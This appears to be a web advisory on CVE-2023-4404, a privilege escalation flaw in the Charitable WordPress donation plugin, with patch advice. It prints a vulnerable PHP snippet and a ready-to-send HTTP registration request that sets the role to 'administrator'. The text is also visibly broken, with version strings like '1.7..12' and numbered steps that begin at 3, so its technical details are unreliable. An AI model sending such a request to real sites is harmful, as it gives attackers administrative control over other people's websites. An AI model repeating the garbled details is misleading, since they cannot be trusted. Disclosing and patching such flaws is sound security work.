CVE-2023-4404: Donation Forms by Charitable WordPress Plugin - A Privilege Escalation Vulnerability

Introduction: Security researchers have identified a new vulnerability in the Donation Forms by Charitable plugin for WordPress. The plugin is highly popular and therefore, a significant number of WordPress users may be at risk. This vulnerability (CVE-2023-4404) is a privilege escalation issue that allows unauthorized attackers to perform actions on behalf of other users and potentially gain administrative permissions.

Plugin Details

Name: Donation Forms by Charitable
Creator: WP Charitable
Plugin Link: https://wordpress.org/plugins/charitable/
Versions Affected: <= 1.7..12

Vulnerability Explanation: The privilege escalation vulnerability exists due to insufficient restrictions on the 'update_core_user' function in the Charitable plugin. This allows unauthenticated attackers to specify their own user role by providing a 'role' parameter during the registration process, thus potentially gaining higher permissions like an administrator.

Code Snippet

In the vulnerable version of the plugin, the 'update_core_user' function does not have any restrictions to prevent the modification of the 'role' parameter:

function update_core_user( $user_id, $values ) {
    ...
    if ( isset( $values['role'] ) ) {
        $user_data['role'] = $values['role'];
    }
    ...
    wp_update_user( $user_data );
}

Register a new user with the role parameter set to 'administrator' in a HTTP request

POST /wp-json/charitable/v1/registration HTTP/1.1
Host: vulnerable.website
Content-Type: application/json
Content-Length: 94

{
  "email": "attacker@example.com",
  "password": "abcd1234",
  "role": "administrator"
}

3. If the plugin and WordPress setup is compromised, the attacker now has an administrator account on the website, and they can perform further actions to completely take control over the website.

Mitigation: It is highly recommended to update the Donation Forms by Charitable plugin to their latest version to avoid this vulnerability. The issue has been patched in version 1.7..13.

Original References

- CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4404
- WPScan Vulnerability Database: https://wpscan.com/vulnerability/520ee3a6-3108-45f4-bd7a-9df0806dc3cb

Conclusion: As always, keep your WordPress plugins up-to-date and further secure your website by regularly monitoring and applying security patches. Avoid using outdated plugins if possible, and stay informed on the latest security issues. The discovery of this vulnerability highlights the importance of being proactive in addressing security vulnerabilities in plugins like the Donation Forms by Charitable plugin for WordPress.

Timeline

Published on: 08/23/2023 02:15:00 UTC
Last modified on: 08/28/2023 20:46:00 UTC